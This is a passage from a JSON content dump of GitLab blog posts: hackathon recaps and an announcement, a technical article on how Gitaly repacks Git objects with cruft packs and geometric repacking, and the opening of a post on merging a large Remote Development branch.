}",{"title":4496,"description":4497,"authors":4501,"heroImage":1348,"date":2754,"body":4502,"category":299,"tags":4503},[704],"\n{::options parse_block_html=\"true\" /}\n\nThe GitLab community gathered on September 2-3 for the Q3 Hackathon and once again the GitLab Community set an impressive Hackathon record with [313 MRs](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/41) submitted!\n\n## What did we accomplish?\n\nThis opening line almost needs to be a placeholder for Hackathon recaps, but the GitLab community is setting new heights with each iteration. I love seeing the chart below that shows an impressive growth in wider community contributions especially over the past 4 Hackathons. \n![hackathon chart](https://about.gitlab.com/images/blogimages/hackathon-blogpost/q3-2020-hackathon-stats.png){: .shadow.medium.center}\n\nOnce again, there were a lot of frontend/UX related epics that wider community members contributed to. A good example was for migration of [Pajamas](https://gitlab.com/gitlab-org/gitlab-services/design.gitlab.com) components and the Hackathon helped chip away at more than 1,000 issues related to this migration. One piece of feedback from the previous Hackathon was to also have plenty of backend-related issues for the Hackathon, and I want to thank many GitLab team members who helped populate the list of [suggested Hackathon issues](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/41#suggested-epicsissues-for-the-hackathon) with backend items. \n\nI believe we had the largest number of office hour/tutorial sessions during this Hackathon and it's great to see 100+ views of many of these sessions within 24 hours of the recordings being posted on [the Hackathon playlist](https://www.youtube.com/playlist?list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh). 
If you're interested in making a further dent in 1,000+ issues related to Pajamas components migration, you should watch the [Pajamas tutorial session](https://www.youtube.com/watch?v=cbZADXJh8fg&list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh&index=5&t=1s). You will see that it only takes 5-10 minutes to submit an MR for these issues.\n\n## Hackathon prizes\n\nFor this Hackathon, we have a laptop sleeve for everyone who had their MRs merged by September 15th and [30 people](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/42) will be receiving the prize celebrating the 2nd anniversary of the Hackathon. As we did in the past several quarters, we have a prize for second place and want to recognize [Gilang Gumilar](https://gitlab.com/gilangmlr), [Kev](https://gitlab.com/KevSlashNull), and [Takuya Noguchi](https://gitlab.com/tnir) who all had more than 20 MRs merged. For the grand prize, I want to award two contributors: [Rajendra Kadam](https://gitlab.com/raju249) with 54 MRs and [Jonston Chan](https://gitlab.com/JonstonChan) with 45 MRs merged! Thanks and congratulations to everyone!\n\n![Hackathon prizes](https://about.gitlab.com/images/blogimages/hackathon-blogpost/q3-2020-hackathon-prizes.png){: .shadow.medium.center}\n\n## When is the next Hackathon?\n\nThe next Hackathon will take place on December 2-3, 2020. It is already advertised on [the Hackathon page](/community/hackathon/) with a new countdown clock. Please look out for more announcements as we get closer to the next Hackathon date. Also, if you have any suggestions for the Q4 Hackathon please feel free to suggest them on [the GitLab Contributors Gitter](https://gitter.im/gitlabhq/contributors).\n\n## Community challenge\n\nYou may have noticed when you scroll through the Hackathon page that we have a new prize under the [Missed the last Hackathon?](https://about.gitlab.com/community/hackathon/#community-challenge) section. 
GitLab team members added the `Community challenge` label to a number of [issues](https://gitlab.com/gitlab-org/gitlab/-/issues?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=Community%20challenge) that we want to encourage the wider community to work on. If you submit an MR for these issues and they get merged, you will receive custom merchandise with the \"Community challenge achieved\" message. If you love coffee or tea, I think you will enjoy this canister for your coffee beans or tea leaves. \n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, UX design, and **project templates**. The [project templates](https://docs.gitlab.com/ee/development/project_templates.html) help developers get started with new languages and frameworks on GitLab. You can improve [existing built-in project templates](https://docs.gitlab.com/ee/user/project/working_with_projects.html#built-in-templates) or start a new template to be distributed with GitLab.\n",[267,779,9],{"slug":4505,"featured":6,"template":689},"q3-hackathon-recap","content:en-us:blog:q3-hackathon-recap.yml","Q3 Hackathon Recap","en-us/blog/q3-hackathon-recap.yml","en-us/blog/q3-hackathon-recap",{"_path":4511,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4512,"content":4517,"config":4522,"_id":4524,"_type":14,"title":4525,"_source":16,"_file":4526,"_stem":4527,"_extension":19},"/en-us/blog/q4-hackathon-announcement",{"title":4513,"description":4514,"ogTitle":4513,"ogDescription":4514,"noIndex":6,"ogImage":1348,"ogUrl":4515,"ogSiteName":673,"ogType":674,"canonicalUrls":4515,"schema":4516},"Get ready for the Q4'2018 GitLab Hackathon","The Q4 Hackathon for the GitLab community will take place on November 14-15.","https://about.gitlab.com/blog/q4-hackathon-announcement","\n                        {\n        \"@context\": \"https://schema.org\",\n  
      \"@type\": \"Article\",\n        \"headline\": \"Get ready for the Q4'2018 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-10-23\",\n      }",{"title":4513,"description":4514,"authors":4518,"heroImage":1348,"date":4519,"body":4520,"category":10,"tags":4521},[704],"2018-10-23","\n\nFollowing the success of [our inaugural event](/blog/hackathon-recap/), the next quarterly Hackathon will take place on November 14-15. We're looking forward to another opportunity for collaboration and meeting with new community members!\n\n## What's the deal?\n\nThis is a virtual event where community members get together to work on merge requests (MRs) and also to welcome and help new contributors. We now have a new [Hackathon landing page](/community/hackathon/), where you will be able to find more details as we get closer to the event. Again, we will have an exciting prize for everyone who has MRs merged within 10 days of the Hackathon:\n\n![GitLab slippers](https://about.gitlab.com/images/blogimages/q4-hackathon-blog/Slippers.JPG){: .shadow.medium.center}\n*\u003Csmall>GitLab slippers for everyone with merged MRs\u003C/small>*\n\nThe person with the most MRs merged during the Hackathon will be able to show off their grand prize around the neighborhood or at a nearby skate park!\n\n![GitLab skateboard](https://about.gitlab.com/images/blogimages/q4-hackathon-blog/Skateboard_-_Gitlab.png){: .shadow.medium.center}\n*\u003Csmall>GitLab skateboard for the grand prize winner\u003C/small>*\n\n## What else is taking place?\n\nIn addition to hacking, we plan to invite community experts for quick presentations plus Q&A sessions on various topics such as getting started as a new contributor, [Meltano](https://gitlab.com/meltano), issue triage, etc. over the two days. These sessions will also be recorded and available on [GitLab YouTube channel](https://www.youtube.com/gitlab).  
If you want to see materials/recordings from the last Hackathon, you can find them in [the Q3 Hackathon wiki page](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/gitlab-hackathon/q3-2018-hackathon/wikis/Q3-2018-Hackathon#links-to-presentations-recordings).\n\n## Where can I find help during the Hackathon?\n\nFor communications during the Hackathon, we will use the [GitLab Community room in Gitter](https://gitter.im/gitlabhq/community). This is a channel designed to have community-related discussions and for community members to help each other as people have questions while contributing to GitLab. This is open to everyone, so please [join the room](https://gitter.im/gitlabhq/community) if you are not part of it already.\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\nCover image: [\"Gitlab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel).\n{: .note}\n",[267,779,9,277],{"slug":4523,"featured":6,"template":689},"q4-hackathon-announcement","content:en-us:blog:q4-hackathon-announcement.yml","Q4 Hackathon Announcement","en-us/blog/q4-hackathon-announcement.yml","en-us/blog/q4-hackathon-announcement",{"_path":4529,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4530,"content":4535,"config":4540,"_id":4542,"_type":14,"title":4543,"_source":16,"_file":4544,"_stem":4545,"_extension":19},"/en-us/blog/q4-hackathon-recap",{"title":4531,"description":4532,"ogTitle":4531,"ogDescription":4532,"noIndex":6,"ogImage":1348,"ogUrl":4533,"ogSiteName":673,"ogType":674,"canonicalUrls":4533,"schema":4534},"What went down at the Q4'2019 GitLab Hackathon","A recap of GitLab community's accomplishments during 
annother record-setting Hackathon on November 13-14.","https://about.gitlab.com/blog/q4-hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What went down at the Q4'2019 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-12-12\",\n      }",{"title":4531,"description":4532,"authors":4536,"heroImage":1348,"date":4537,"body":4538,"category":951,"tags":4539},[704],"2019-12-12","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nThe GitLab community gathered on November 13-14 for the Q4 Hackathon, and I never get tired of saying that we again set a new record for the number of [MRs submitted (109)](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/28#merge-request-list). It was great to see many new community members join with their first MRs and also follow the tutorial sessions. If you missed any of the tutorial sessions, you can find recordings on [the Hackathon playlist](https://www.youtube.com/playlist?list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh). Also, if you have any suggestions for tutorial topics at future Hackathons you should definitely let me know in the comments section below!\n\n## What did we accomplish?\n\nI mentioned during the kickoff session that it'd be nice to cross the 100 mark for the Hackathon MRs and we saw over 70 MRs on the first day alone. Out of the 109 Hackathon MRs, 79 of these were merged by November 25th, so again big kudos to wider community members and reviewers who made all this possible. \n\nThere are a few things I think deserve special mention. First is [this Epic](https://gitlab.com/groups/gitlab-org/-/epics/2197) that was created by GitLab's Senior Frontend Engineer [Winnie Hellmann](https://gitlab.com/winh) before the Hackathon. 
The Epic had \"bite-sized\" issues that contributors were able to tackle during the event and led to almost 30 MRs during the Hackathon. I think this is a great template that we can use for future Hackathons to make it easier for participants to find issues that they can work on. Winnie was also active in providing timely reviews of these MRs and this was certainly appreciated by the wider community.  \n\nThe second highlight was [this MR](https://gitlab.com/gitlab-com/www-gitlab-com/merge_requests/34822) from [Utkarsh Gupta](https://gitlab.com/utkarsh2102) as he helped make sure gender-neutral pronouns are used in our [handbook](https://about.gitlab.com/handbook/). MRs like this help make sure that we continue to have a great community at GitLab in addition to having great software and documentation. As you can see in the next section, Utkarsh made a lot of contributions during the Hackathon, but this MR made me feel proud to be a part of the GitLab community. \n\n![Hackathon stats](https://about.gitlab.com/images/blogimages/hackathon-blogpost/q4-hackathon-stats-chart.png){: .shadow.medium.center}\n\n## Hackathon prizes\n\nFor this Hackathon, we created a tech organizer for everyone who had their MRs merged by November 25th and [18 people](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/29) will be receiving the GitLab branded organizer. As we did in the past few quarters, we have a prize for second place and [Lee Tickett](https://gitlab.com/leetickett) is the winner with 15 MRs merged. The grand prize goes to [Utkarsh Gupta](https://gitlab.com/utkarsh2102) with 28 MRs merged, which is another record for the grand prize (the previous record was 13 MRs). 
Thanks and congratulations to everyone!\n\n![Hackathon prizes](https://about.gitlab.com/images/blogimages/hackathon-blogpost/q4-hackathon-prizes.png){: .shadow.medium.center}\n\n## When is the next Hackathon?\n\nI'm happy to announce that the Q1 Hackathon will take place on February 12-13, 2020. It is already advertised on [the Hackathon page](/community/hackathon/) with a new countdown clock. Please look out for more announcements as we get closer to the next Hackathon date. Also, if you have any suggestions for the Q1 Hackathon please feel free to suggest them on [the GitLab Contributors Gitter](https://gitter.im/gitlabhq/contributors).\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9],{"slug":4541,"featured":6,"template":689},"q4-hackathon-recap","content:en-us:blog:q4-hackathon-recap.yml","Q4 Hackathon Recap","en-us/blog/q4-hackathon-recap.yml","en-us/blog/q4-hackathon-recap",{"_path":4547,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4548,"content":4553,"config":4559,"_id":4561,"_type":14,"title":4562,"_source":16,"_file":4563,"_stem":4564,"_extension":19},"/en-us/blog/q42020-hackathon-recap",{"title":4549,"description":4550,"ogTitle":4549,"ogDescription":4550,"noIndex":6,"ogImage":1348,"ogUrl":4551,"ogSiteName":673,"ogType":674,"canonicalUrls":4551,"schema":4552},"What happened at the Q4'2020 GitLab Hackathon","Here's a recap of GitLab community accomplishments during the Hackathon on Jan 6-7th of 2021.","https://about.gitlab.com/blog/q42020-hackathon-recap","\n                        {\n        \"@context\": 
\"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What happened at the Q4'2020 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Christos Bacharakis\"}],\n        \"datePublished\": \"2021-02-08\",\n      }",{"title":4549,"description":4550,"authors":4554,"heroImage":1348,"date":4556,"body":4557,"category":10,"tags":4558},[4555],"Christos Bacharakis","2021-02-08","\n\n{::options parse_block_html=\"true\" /}\n\n\n\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>&nbsp;&nbsp;\nDisclaimer: Due to a [bug in our metrics platform](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/general/-/issues/59), that was identified a month after the release of this blogpost, we updated the post with accurate information about the number of MRs submitted, MRs merged, and the winners. In addition, we are not going to take into account the 15th of January as the date the MRs had to be merged to qualify, since we noticed a significant amount of delays in reviewing the MRs.\n&nbsp;&nbsp;\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n\nAnother GitLab hackathon is completed, and I would like to begin by celebrating our community contributions! Congratulations to everyone who participated and contributed to GitLab.\n\nThis time, participants managed to land 167 Merge Requests, where 139 (83%) of them have already been merged across eight projects such as: GitLab, Omnibus, GitLab Development Kit, CNG, Runner and more.\n\n![Hackathon playlist](https://about.gitlab.com/images/blogimages/Hackathon_playlist.png){: .shadow.medium.center}\n\nDuring the Hackathon, a number of GitLab Team members ran a series of tutorial sessions around various GitLab Products, stages and groups like Runner, Release Stage, GitLab Pajamas, and Package Group. 
All of these sessions that are a resource for future contributions were recorded and can be found on our [YouTube Channel](https://www.youtube.com/playlist?list=PL05JrBw4t0KrqGydhkV_BUPrI-DBiDKfm).\n\nSomething unique about this Hackathon is that it happened two times. Originally it was scheduled to take place in December, around the time my onboarding was going to be completed; thus, we had to move it to the beginning of January. Our Tokyo community had already made arrangements for these dates, and with the lead of our Core Team member [Takuya Noguchi](https://gitlab.com/tnir), they successfully organized a [regional GitLab hackathon](https://gitlab-jp.connpass.com/event/189496/). \n\n\n## Hackathon prizes\n\nLike past events, everyone who had MRs merged will receive a token of our appreciation for their contribution. This time, [thirty-seven people](https://gitlab.biterg.io/goto/2c0b5d1d60893bcec44dbfd11a16d947) had their MRs merged, and three of them had more than 10 MRs merged and will receive the Second Prize.\n\nThe grand prize will go to both [Kev](https://gitlab.com/KevSlashNull) and [Jonston Chan](https://gitlab.com/JonstonChan) who had the highest number of merged MRs.\n\nBelow is a list of the top five contributors for this Hackathon, and all the MRs can be found in the [Wider Community Hackathon MRs issue](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/44#related-merge-requests).\n\n- Grand Prize: [Kev](https://gitlab.com/KevSlashNull), with 31 MRs merged\n- Grand Prize: [Jonston Chan](https://gitlab.com/JonstonChan), with 30 MRs merged\n- Second Prize: [Yogi](https://gitlab.com/yo), with 16 MRs merged\n- Second Prize: [Takuya Noguchi](https://gitlab.com/tnir), with 12 MRs merged\n- Second Prize: [Marvin Karegyeya](https://gitlab.com/nuwe1), with 10 MRs merged\n\n\n![Hackathon playlist](https://about.gitlab.com/images/blogimages/q4-hackathon-details.png){: .shadow.medium.center}\n\n## When is the next 
Hackathon?\n\nThe next Hackathon will occur on March 31st - April 1st, 2021 (yes, it's true!), and all the necessary information will be posted on the [Hackathon page by March 1st](/community/hackathon/).\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at cbacharakis@gitlab.com.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9],{"slug":4560,"featured":6,"template":689},"q42020-hackathon-recap","content:en-us:blog:q42020-hackathon-recap.yml","Q42020 Hackathon Recap","en-us/blog/q42020-hackathon-recap.yml","en-us/blog/q42020-hackathon-recap",{"_path":4566,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4567,"content":4573,"config":4578,"_id":4580,"_type":14,"title":4581,"_source":16,"_file":4582,"_stem":4583,"_extension":19},"/en-us/blog/rearchitecting-git-object-database-mainentance-for-scale",{"title":4568,"description":4569,"ogTitle":4568,"ogDescription":4569,"noIndex":6,"ogImage":4570,"ogUrl":4571,"ogSiteName":673,"ogType":674,"canonicalUrls":4571,"schema":4572},"Why and how we rearchitected Git object database maintenance for scale","Go in-depth into improvements to maintenance of the Git object database for reduced overhead and increased efficiency.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664413/Blog/Hero%20Images/speedlights.png","https://about.gitlab.com/blog/rearchitecting-git-object-database-mainentance-for-scale","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why and how we rearchitected Git object database maintenance for scale\",\n        \"author\": 
[{\"@type\":\"Person\",\"name\":\"Patrick Steinhardt\"}],\n        \"datePublished\": \"2023-11-02\",\n      }",{"title":4568,"description":4569,"authors":4574,"heroImage":4570,"date":4575,"body":4576,"category":801,"tags":4577},[747],"2023-11-02","\n[Gitaly](/direction/gitaly/#gitaly-1), the service that is responsible for providing access to Git repositories in GitLab, needs to ensure that the repositories are maintained regularly. Regular maintenance ensures:\n\n- fast access to these repositories for users\n- reduced resource usage for servers\n\nHowever, repository maintenance is quite expensive by itself and especially so for large monorepos.\n\nIn [a past blog post](/blog/scaling-repository-maintenance/), we discussed how we revamped the foundations of repository maintenance so that we can iterate on the exact maintenance strategy more readily. This blog post will go through improved maintenance strategies for objects hosted in a Git repository, which was enabled by that groundwork.\n\n- [The object database](#the-object-database)\n- [The old way of packing objects](#the-old-way-of-packing-objects)\n- [All-into-one repacks](#all-into-one-repacks)\n- [Deletion of unreachable objects](#deletion-of-unreachable-objects)\n- [Reachability checks](#reachability-checks)\n- [The new way of packing objects](#the-new-way-of-packing-objects)\n- [Cruft packs](#cruft-packs)\n- [More efficient incremental repacks](#more-efficient-incremental-repacks)\n- [Geometric repacking](#geometric-repacking)\n- [Real-world results](#real-world-results)\n\n## The object database\n\nWhenever a user makes changes in a Git repository, these changes come in the form of new objects written into the repository. 
Typically, any such object is written into the repository as a so-called \"loose object,\" which is a separate file that contains the compressed contents of the object itself with a header that identifies the type of the object.\n\nTo demonstrate this, in the following example we use\n[`git-hash-object(1)`](https://www.git-scm.com/docs/git-hash-object) to write a new blob into the repository:\n\n```shell\n $ git init --bare repository.git\nInitialized empty Git repository in /tmp/repository.git/\n $ cd repository.git/\n $ echo \"contents\" | git hash-object -w --stdin\n12f00e90b6ef79117ce6e650416b8cf517099b78\n $ tree objects\nobjects\n├── 12\n│   └── f00e90b6ef79117ce6e650416b8cf517099b78\n├── info\n└── pack\n\n4 directories, 1 file\n```\n\nAs you can see, the new object was written into the repository and stored as a separate file in the objects database.\n\nOver time, many of these loose objects will accumulate in the repository. Larger repositories tend to have millions of objects, and storing all of them as separate files is going to be inefficient. To ensure that the repository can be served efficiently to our users and to keep the load on servers low, Git will regularly compress loose objects into packfiles. 
We can compress loose objects manually by using, for example, [`git-pack-objects(1)`](https://www.git-scm.com/docs/git-pack-objects):\n\n```shell\n $ git pack-objects --pack-loose-unreachable ./objects/pack/pack \u003C/dev/null\nEnumerating objects: 1, done.\nCounting objects: 100% (1/1), done.\nWriting objects: 100% (1/1), done.\nTotal 1 (delta 0), reused 0 (delta 0), pack-reused 0\n7ce39d49d7ddbbbbea66ac3d5134e6089210feef\n $ tree objects\n objects/\n├── 12\n│   └── f00e90b6ef79117ce6e650416b8cf517099b78\n├── info\n│   └── packs\n└── pack\n    ├── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.idx\n    └── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.pack\n```\n\nThe loose object was compressed into a packfile (`.pack`) with a packfile index (`.idx`) that is used to efficiently access objects in that packfile.\n\nHowever, the loose object still exists. To remove it, we can execute [`git-prune-packed(1)`](https://www.git-scm.com/docs/git-prune-packed) to delete all objects that have been packed already:\n\n```shell\n $ git prune-packed\n $ tree objects/\nobjects/\n├── info\n│   └── packs\n└── pack\n    ├── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.idx\n    └── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.pack\n```\n\nFor end users of Git, all of this happens automatically because Git calls `git gc --auto` regularly. This command uses heuristics to figure out what needs to be optimized and whether loose objects need to be compressed into packfiles. This command is unsuitable for the server side because:\n\n- The command does not scale well enough in its current form. The Git project must be more conservative about changing defaults because they support a lot of different use cases. 
Because we know about the specific needs that we have at GitLab, we can adopt new features that allow for more efficient maintenance more readily.\n- The command does not provide an easy way to observe what exactly it is doing, so we cannot provide meaningful metrics.\n- The command does not allow us to fully control all its exact inner workings and so is not flexible enough.\n\nTherefore, Gitaly uses its own maintenance strategy to maintain Git repositories, of which maintaining the object database is one part.\n\n## The old way of packing objects\n\nAny maintenance strategy to pack objects must ensure the following three things to keep a repository efficient and effective with disk space:\n\n- Loose objects must be compressed into packfiles.\n- Packfiles must be merged into larger packfiles.\n- Objects that are not reachable anymore must be deleted eventually.\n\nPrevious to GitLab 16.0, Gitaly used the following three heuristics to ensure that those three things happened:\n\n- If the number of packfiles in the repository exceeds a certain threshold, Gitaly rewrote all packfiles into a single new packfile. Any objects that were unreachable were put into loose files so that they could be deleted after a certain grace period.\n- If the number of loose objects exceeded a certain threshold, Gitaly compressed all reachable loose objects into a new packfile.\n- If the number of loose objects that are older than the grace period for object deletion exceeded a certain threshold, Gitaly deleted those objects.\n\nWhile these heuristics satisfy all three requirements, they have several downsides, especially in large monorepos that contain gigabytes of data.\n\n### All-into-one repacks\n\nFirst and foremost, the first heuristic requires us to do all-into-one repacks where all packfiles are regularly compressed into a single packfile. In Git repositories with high activity levels, we usually create lots of packfiles during normal operations. 
But because we need to limit the maximum number of packfiles in a repository, we need to regularly do these complete rewrites of all objects.\n\nUnfortunately, doing such an all-into-one repack can be prohibitively expensive in large monorepos. The repacks may allocate large amounts of memory and typically keep multiple CPU cores busy during the repack, which can require hours of time to complete.\n\nSo, ideally, we want to avoid these all-into-one repacks to the best extent possible.\n\n### Deletion of unreachable objects\n\nTo avoid certain race conditions, Gitaly and Git enforce a grace period before an unreachable object is eligible for deletion. This grace period is tracked using the access time of such an unreachable object: If the last access time of the object is earlier than the grace period, the unreachable object can be deleted.\n\nTo track the access time of a single object, the object must exist as a loose object. This means that all objects that are pending deletion will be evicted from any packfile they were previously part of and become loose objects.\n\nBecause the grace period we have in place for Gitaly is 14 days, large monorepos tend to grow a large number of such loose objects that are pending deletion. This has two effects:\n\n- The number of loose objects overall grows, which makes object lookup less efficient.\n- Loose objects are stored a lot less efficiently than packed objects, which means that the disk space required for the objects that are pending deletion is significantly higher than if those objects were stored in their packed form.\n\nIdeally, we would be able to store unreachable objects in packed format while still being able to store their last access times separately.\n\n### Reachability checks\n\nCompressing loose objects into a new packfile is done by using an incremental repack. 
Git will compute the reachability of all objects in the repository and then pack all loose objects that are reachable into a new packfile.\n\nTo determine reachability of an object, we have to perform a complete graph walk. Starting at all objects that are directly referenced, we walk down any links that those objects have to any other objects. Once we reach the root of the object graph, we have then split all objects into two sets, which are the reachable and unreachable objects.\n\nThis operation can be quite expensive and the larger the repository and the more objects it contains, the more expensive this computation gets. As mentioned above though, objects which are about to be deleted need to be stored\nas loose objects such that we can track their last access time. So if our incremental repack compressed all loose objects into a packfile regardless of their reachability, then this would impact our ability to track the grace\nperiod per object.\n\nThe ideal solution here would avoid doing reachability checks altogether while still being able to track the grace period of unreachable objects which are pending deletion individually.\n\n## The new way of packing objects\n\nOver the past two years, the Git project has shipped multiple mechanisms that allow us to address all of these pain points we had with our old strategy. These new mechanisms come in two different forms:\n\n- Geometric repacking allows us to merge multiple packfiles without having to rewrite all packfiles into one. This feature was introduced in [Git v2.32.0](https://gitlab.com/gitlab-org/git/-/commit/2744383cbda9bbbe4219bd3532757ae6d28460e1).\n- Cruft packs allow us to store objects that are pending deletion in compressed format in a packfile. 
This feature was introduced in [Git v2.37.0](https://gitlab.com/gitlab-org/git/-/commit/a50036da1a39806a8ae1aba2e2f2fea6f7fb8e08).\n\nThe Gitaly team has reworked the object database maintenance strategy to make use of these new features.\n\n### Cruft packs\nPrevious to Git v2.37.0, pruning objects with a grace period required Git to first unpack packed objects into loose objects. We did this so that we can track the per-object access times for unreachable objects that are pending deletion as explained above. This is inefficient though as it potentially requires us to keep a lot of unreachable objects in loose format until they can be deleted after the grace period.\n\nWith Git v2.37.0, [git-repack(1)](https://www.git-scm.com/docs/git-repack) learned to write [cruft packs](https://git-scm.com/docs/cruft-packs). While a cruft pack looks just like a normal pack, it also has an accompanying\n`.mtimes` file:\n\n```shell\n$ tree objects/\nobjects/\n├── info\n│   └── packs\n└── pack\n    ├── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.idx\n    ├── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.mtimes\n    └── pack-7ce39d49d7ddbbbbea66ac3d5134e6089210feef.pack\n```\n\nThis file contains per-object timestamps that record when the object was last accessed. With this, we can continue to track per-object grace periods while storing the objects in a more efficient way compared to loose objects.\n\nIn Gitaly, we [started to make use of cruft packs](https://gitlab.com/gitlab-org/gitaly/-/merge_requests/5454) in GitLab 15.10 and made the feature generally available in GitLab 15.11. 
and not as a loose object anymore, we can instead compress all loose objects into a packfile.
We notice that the two smallest packfiles do not form a geometric sequence as they both contain two objects each.\n\n![Geometrically repacking packfiles, initial](https://about.gitlab.com/images/blogimages/2023-10-09-repository-scaling-odb-maintenance/geometric-repacking-1.png)\n\n1. We identify the smallest slice of packfiles that need to be repacked in order to restore the geometric sequence. Merging the smallest two packfiles would lead to a packfile with four objects. This would not be sufficient to restore the geometric sequence as the next-biggest packfile contains four objects, as well.\n\nInstead, we need to merge the smallest three packfiles into a new packfile that contains eight objects in total. As `8 × 2 ≤ 16` the geometric sequence is restored.\n\n![Geometrically repacking packfiles, combining](https://about.gitlab.com/images/blogimages/2023-10-09-repository-scaling-odb-maintenance/geometric-repacking-2.png)\n\n3. We merge those packfiles into a new packfile.\n\n![Geometrically repacking packfiles, final](https://about.gitlab.com/images/blogimages/2023-10-09-repository-scaling-odb-maintenance/geometric-repacking-3.png)\n\nOriginally, we introduced this new feature [into Gitaly in GitLab 15.11](https://gitlab.com/gitlab-org/gitaly/-/merge_requests/5590).\n\nUnfortunately, we had to quickly revert this new mode. It turned out that the geometric strategy was not ready to handle Git repositories that had an alternate object database connected to them. Because we make use of this feature to [deduplicate objects across forks](https://docs.gitlab.com/ee/development/git_object_deduplication.html), the new repacking strategy led to problems.\n\nAs active contributors to the Git project, we set out to fix these limitations in git-repack(1) itself. 
But after the initial dust settled, we can see
The following graph shows the time we spent performing housekeeping tasks in our own `gitlab-org` and `gitlab-com` groups, which host some of the most active repositories that have caused issues in the past:\n\n![Time spent optimizing repositories in GitLab groups](https://about.gitlab.com/images/blogimages/2023-10-09-repository-scaling-odb-maintenance/gitlab-groups-optimization.png)\n\nIn summary, we have observed the following improvements:\n\n|                                                        | Before              | After                | Change |\n| ------------------------------------------------------ | ------------------- | -------------------- | ------ |\n| Global accumulated repacking time                      | ~5.2 hours/hour     | ~4.2 hours/hour      | -20%   |\n| Large repositories of gitlab-org and gitlab-com groups | ~0.7-1.0 hours/hour | 0.12-0.15 hours/hour | -80%   |\n\nWe have heard of other customers that saw similar improvements in highly active large monorepositories.\n\n## Manually enable geometric repacking\n\nWhile the new geometric repacking strategy has been default-enabled starting with GitLab 16.0, it was introduced with GitLab 15.11. If you want to use the\nnew geometric repacking mode, you can opt in by setting the\n`gitaly_geometric_repacking` feature flag. 
"Rearchitecting Git Object Database Maintenance For Scale"
GitLab Project. This was no small ask, as the merge request was of considerable size and complexity. In this blog post, we'll delve into the background, justifications, and process behind this endeavor.\n\nThe merge request titled \"Remote Development feature behind a feature flag\" was initiated by the Create:IDE team, aiming to merge the branch \"remote_dev\" into the \"master\" branch in the Rails monolith GitLab project. The MR contained `4` commits, `258` pipelines, and `143` changes that amounted to a total of `+7243` lines of code added to the codebase.\n\nInitially, the MR was created to reflect the work related to \"Remote Development\" under the \"Category: Remote Development.\" It was primarily intended to have CI pipeline coverage for the integration branch and was not meant for individual review or direct merging. The plan was to merge this code into the master branch via the [\"Remote Development Beta - Review and merge\" Epic](https://gitlab.com/groups/gitlab-org/-/epics/10258).\n\n![SUM](https://about.gitlab.com/images/blogimages/remote-development/SUM.png){: .shadow.medium}\n\n### How the Remote Development project started\nAs a team, we embarked on an ambitious journey to create a greenfield feature: the [Remote Development](https://docs.gitlab.com/ee/user/project/remote_development/) offering at GitLab. This feature had a vast scope, many unknowns, and required solving numerous new problems. To efficiently tackle this task, we decided to work on an integration branch using a [low-ceremony process](https://stackoverflow.com/questions/68092498/what-does-low-ceremony-mean). 
would not allow us to meet our goal of releasing the feature in GitLab 16.0.
without it being too prescriptive of an approach
